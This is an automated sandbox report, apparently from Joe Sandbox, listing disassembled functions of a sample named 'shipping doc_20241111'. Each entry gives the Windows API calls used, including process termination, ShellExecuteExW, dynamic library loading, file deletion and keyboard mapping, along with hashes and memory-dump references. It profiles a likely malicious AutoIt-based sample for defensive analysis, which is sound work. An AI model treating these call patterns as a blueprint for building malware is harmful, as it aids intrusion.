Opcode ID: 92de5f977b5d632944a20e63d6830e16c7c3f898883f0d51cf02fe717f3fd8d4
Instruction ID: 04391a9e1bd6526ea90a22ad5f4bdad100c2758fa693f138a38062de97f6e3a2
Opcode Fuzzy Hash: 92de5f977b5d632944a20e63d6830e16c7c3f898883f0d51cf02fe717f3fd8d4
Instruction Fuzzy Hash: E8F0CD32D0160176D6B23739AC0AE5E3356ABC67B0F25C51FF92C921D5EF6D8842B153

Function 00FD8916 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00F5AABF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F5AB19
Part of subcall function 00F5AABF: SelectObject.GDI32(?,00000000), ref: 00F5AB28
Part of subcall function 00F5AABF: BeginPath.GDI32(?), ref: 00F5AB3F
Part of subcall function 00F5AABF: SelectObject.GDI32(?,00000000), ref: 00F5AB68

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00FD8940
LineTo.GDI32(?,00000003,00000000), ref: 00FD8954
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00FD8962
LineTo.GDI32(?,00000000,00000003), ref: 00FD8972
EndPath.GDI32(?), ref: 00FD8982
StrokePath.GDI32(?), ref: 00FD8992

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 52320fc9eb13575110c06356ccc2a506757aa7d2492443d70abd47c8d31e3f36
Instruction ID: 3a38ae586b997c04a81b7afbd3c69525c7f92e4ac4a430041a24e7e83e179047
Opcode Fuzzy Hash: 52320fc9eb13575110c06356ccc2a506757aa7d2492443d70abd47c8d31e3f36
Instruction Fuzzy Hash: CC112D7644114DFFDF129FA0DC88EAA7F6EEF08350F048012FA599A161C7729D55EBA0

Function 00FA5153 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00FA516E
GetDeviceCaps.GDI32(00000000,00000058), ref: 00FA517F
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FA5186
ReleaseDC.USER32(00000000,00000000), ref: 00FA518E
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00FA51A5
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00FA51B7

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 3dc4661780b4d9f54ce9d7b39bf528116883af87a89c2d0d555c64ab87b2615b
Instruction ID: 37194609bc5fd023a342a92444801f21db0252f1b762ecdef78dc2f9d1ee583e
Opcode Fuzzy Hash: 3dc4661780b4d9f54ce9d7b39bf528116883af87a89c2d0d555c64ab87b2615b
Instruction Fuzzy Hash: D9017CB5E41319BBEF109BB59C49B5ABFA9EB48761F104066EA04A7281D6709C00DFA0

Function 00F434CE Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F434FF
MapVirtualKeyW.USER32(00000010,00000000), ref: 00F43507
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F43512
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F4351D
MapVirtualKeyW.USER32(00000011,00000000), ref: 00F43525
MapVirtualKeyW.USER32(00000012,00000000), ref: 00F4352D

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: b4c962046b38588969aaf76314bd7a0954c29f6eff3cc1699a8272deca7042cd
Instruction ID: 71e2f77f04591c19ede8edb9babd957f25ec4984bcf17efb6265c54cc84ef98f
Opcode Fuzzy Hash: b4c962046b38588969aaf76314bd7a0954c29f6eff3cc1699a8272deca7042cd
Instruction Fuzzy Hash: 0E0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5

Function 00FAEA3E Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00FAEA4E
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00FAEA64
GetWindowThreadProcessId.USER32(?,?), ref: 00FAEA73
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FAEA82
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FAEA8C
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FAEA93

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: f8821973ab2332d11263f59d39714364cfe7a6d25537a8bae7223b93cc317fd5
Instruction ID: 74abe34d67c68c1cdcec5c01093c187eead11bfed4782e7de98723f33047f487
Opcode Fuzzy Hash: f8821973ab2332d11263f59d39714364cfe7a6d25537a8bae7223b93cc317fd5
Instruction Fuzzy Hash: 03F06D7214212ABBEB201B629C0EEAF3B7DEBC6B11F00415AF601D109097A05A01E6B4

Function 00F97DF6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00F97E0F
SendMessageW.USER32(?,00001328,00000000,?), ref: 00F97E26
GetWindowDC.USER32(?), ref: 00F97E32
GetPixel.GDI32(00000000,?,?), ref: 00F97E41
ReleaseDC.USER32(?,00000000), ref: 00F97E53
GetSysColor.USER32(00000005), ref: 00F97E6D

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 3f1c60267e2e942d5173803ca56c1194d12eefdfa44d48f740c13f70c73d13b6
Instruction ID: 370790dd317c33a05bd55e99cbef60e0742ab9d9e336bf5240d206c2e81a35d8
Opcode Fuzzy Hash: 3f1c60267e2e942d5173803ca56c1194d12eefdfa44d48f740c13f70c73d13b6
Instruction Fuzzy Hash: AC014B3280561AEFEF606B74DC08BAA7BB6FB04321F5405A2FA19A21A1CB311D51FF50

Function 00FA17B8 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FA17C3
UnloadUserProfile.USERENV(?,?), ref: 00FA17CF
CloseHandle.KERNEL32(?), ref: 00FA17D8
CloseHandle.KERNEL32(?), ref: 00FA17E0
GetProcessHeap.KERNEL32(00000000,?), ref: 00FA17E9
HeapFree.KERNEL32(00000000), ref: 00FA17F0

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: eb2c8b53b25d302b9c8c9041de7f599406efa54e5b3f666ffc551f221a08c356
Instruction ID: 7ceacc2737b6d4c8e4f623679bc39fd6db74b64faa2b580cb4cabe04c3d0d747
Opcode Fuzzy Hash: eb2c8b53b25d302b9c8c9041de7f599406efa54e5b3f666ffc551f221a08c356
Instruction Fuzzy Hash: 43E0ED3604511AFBDB012FB2EC0C905BF3AFF4A7227108222F225810B1CB325420EF90

Function 00FAC4EE Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F48FA0: _wcslen.LIBCMT ref: 00F48FA5

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FAC60C
_wcslen.LIBCMT ref: 00FAC653
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FAC6BA
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00FAC6E8

Strings

0, xrefs: 00FAC5CD

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 1826ae2538417302d5877997e358b285d23363f458f89127939a6a9b33696dc0
Instruction ID: 8f2a327e538f394a47fd1e1a973e4c1104d5b63f272e05178fe37b809d822714
Opcode Fuzzy Hash: 1826ae2538417302d5877997e358b285d23363f458f89127939a6a9b33696dc0
Instruction Fuzzy Hash: 9851C1B1A043019ED714DF38CC45B6B77E8AF8A320F080A2DF999D7291DB74D944ABD2

Function 00FCAC8B Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00FCADCA

Part of subcall function 00F48FA0: _wcslen.LIBCMT ref: 00F48FA5

GetProcessId.KERNEL32(00000000), ref: 00FCAE5F
CloseHandle.KERNEL32(00000000), ref: 00FCAE8E

Strings

<, xrefs: 00FCAD92
@, xrefs: 00FCAD99

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: bb1b5d16e0687181cc02094bf8122c9f2bd08c396ccb2e4ae63477a7547e9c6f
Instruction ID: 0030c1fab07f7bb683c5cbe8d0b3caa0fe002671f370095000d13e3b70dccf79
Opcode Fuzzy Hash: bb1b5d16e0687181cc02094bf8122c9f2bd08c396ccb2e4ae63477a7547e9c6f
Instruction Fuzzy Hash: 77718C71A0061ADFCB10DFA4C985A9EBBF1BF08314F04849DE816AB352CB78ED45DB91

Function 00FA70F4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FA715C
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00FA7192
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00FA71A3
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00FA7225

Strings

DllGetClassObject, xrefs: 00FA7198

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: d5960210105d9e8143d2dede0c5e826b2a395e27798affbf64761b306286dee4
Instruction ID: 03326f11e6131cfd8a0a88832db03ee675738589215cbab5dac02b836a04b50c
Opcode Fuzzy Hash: d5960210105d9e8143d2dede0c5e826b2a395e27798affbf64761b306286dee4
Instruction Fuzzy Hash: 40416AB1604305EFDF15EF64CC84F9A7BE9EF46310B1480AAB9059F246D7B1D944EBA0

Function 00FD3CAF Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FD3D68
IsMenu.USER32(?), ref: 00FD3D7D
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00FD3DC5
DrawMenuBar.USER32 ref: 00FD3DD8

Strings

0, xrefs: 00FD3CBC

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 2b46f52051411df626ced11df6ea09553bee3c238b5a3072b5d0763e044e82d5
Instruction ID: 59ff451f811ded80d145420a2b6c14aec0d9e261436e73fb608e5a82e4713a2f
Opcode Fuzzy Hash: 2b46f52051411df626ced11df6ea09553bee3c238b5a3072b5d0763e044e82d5
Instruction Fuzzy Hash: F4415E75A0120DEFDB10DF60D884ADA7BB6FF04364F18411AEA95A7350D736AE40EFA1

Function 00FA1D26 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F4B606: _wcslen.LIBCMT ref: 00F4B610

Part of subcall function 00FA3BEF: GetClassNameW.USER32(?,?,000000FF), ref: 00FA3C12

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00FA1DAA
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00FA1DBD
SendMessageW.USER32(?,00000189,?,00000000), ref: 00FA1DED

Part of subcall function 00F484E7: _wcslen.LIBCMT ref: 00F484FA

Strings

ComboBox, xrefs: 00FA1D34
ListBox, xrefs: 00FA1D69

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: f06c5abf2f579bce6795c943acd9b85c403b2c93a1f8d707c45e89b3a3de5d27
Instruction ID: 1b0b73d1ddbc93e40bda9827afb7be83e6396126a28fef798d16884ad9748e79
Opcode Fuzzy Hash: f06c5abf2f579bce6795c943acd9b85c403b2c93a1f8d707c45e89b3a3de5d27
Instruction Fuzzy Hash: 3621F8B1E001047EDB149B64CC85CFE7B79DF563A0F15411AF815A71D1DB38990AA620

Function 00FD2E4A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00FD2EC0
LoadLibraryW.KERNEL32(?), ref: 00FD2EC7
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00FD2EDC
DestroyWindow.USER32(?), ref: 00FD2EE4

Strings

SysAnimate32, xrefs: 00FD2E9B

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 40eeb741b33cc6123f9965df44ae642c4c091ed170bb8842ff98c9d6512489a4
Instruction ID: 3e79a1defee4b200c378c902c0867e446aed33b7ccbb224eeec84fa0e9619445
Opcode Fuzzy Hash: 40eeb741b33cc6123f9965df44ae642c4c091ed170bb8842ff98c9d6512489a4
Instruction Fuzzy Hash: 0721AE71A0020AAFEB108F74DC40EBB37AEFB69374F14461AFA5096290D771DC41B7A0

Function 00F64CFD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00F64CAE,00000003,?,00F64C4E,00000003,010088C8,0000000C,00F64DA5,00000003,00000002), ref: 00F64D1D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F64D30
FreeLibrary.KERNEL32(00000000,?,?,?,00F64CAE,00000003,?,00F64C4E,00000003,010088C8,0000000C,00F64DA5,00000003,00000002,00000000), ref: 00F64D53

Strings

mscoree.dll, xrefs: 00F64D16
CorExitProcess, xrefs: 00F64D28

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 062798a22149c0a41d4c8a14916ff0e0fc02e604e86c8f9d276e862a3a9e28e9
Instruction ID: 024901e9a25f9f57f306a507d8619714a4af248ca4dc109c44db6d79ad4fe609
Opcode Fuzzy Hash: 062798a22149c0a41d4c8a14916ff0e0fc02e604e86c8f9d276e862a3a9e28e9
Instruction Fuzzy Hash: F4F04F34A0121DBBDB119FA1DC09BADBBB5EF44752F0401A5F805A6160CF759A80EBD1

Function 00F46832 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F4687F,?,01011418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F4683E
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F46850
FreeLibrary.KERNEL32(00000000,?,?,00F4687F,?,01011418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F46862

Strings

kernel32.dll, xrefs: 00F46836
Wow64DisableWow64FsRedirection, xrefs: 00F4684A

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: c2b577322f13bfc62314504493b0f9ac687df0376773e24116f3c36de3310401
Instruction ID: b2fa770cfa87701a248d2f519bef80cb1248275b2eb9e74213e9b8cfe0970646
Opcode Fuzzy Hash: c2b577322f13bfc62314504493b0f9ac687df0376773e24116f3c36de3310401
Instruction Fuzzy Hash: 94E08632A0263717A32217266C08A5A7B159F82B23F050027FD04D2250DF50CC02E0F2

Function 00F467FB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F8488B,?,01011418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F46804
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F46816
FreeLibrary.KERNEL32(00000000,?,?,00F8488B,?,01011418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F46829

Strings

Wow64RevertWow64FsRedirection, xrefs: 00F46810
kernel32.dll, xrefs: 00F467FD

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 29d196be7104efd763310a759bba4daab5ff93ece25c51ecbe718266e6dcbd2e
Instruction ID: 446c7567d998f8a2f28f8fcf75b6bd5d0a87f372098637eed4c9212e619686a2
Opcode Fuzzy Hash: 29d196be7104efd763310a759bba4daab5ff93ece25c51ecbe718266e6dcbd2e
Instruction Fuzzy Hash: CED012329436335756221735AC1898F7F15DF86B393050126BC01E6159DF25CD02E5E1

Function 00FB2865 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FB2B23
DeleteFileW.KERNEL32(?), ref: 00FB2BA5
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00FB2BBB
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FB2BCC
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FB2BDE

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

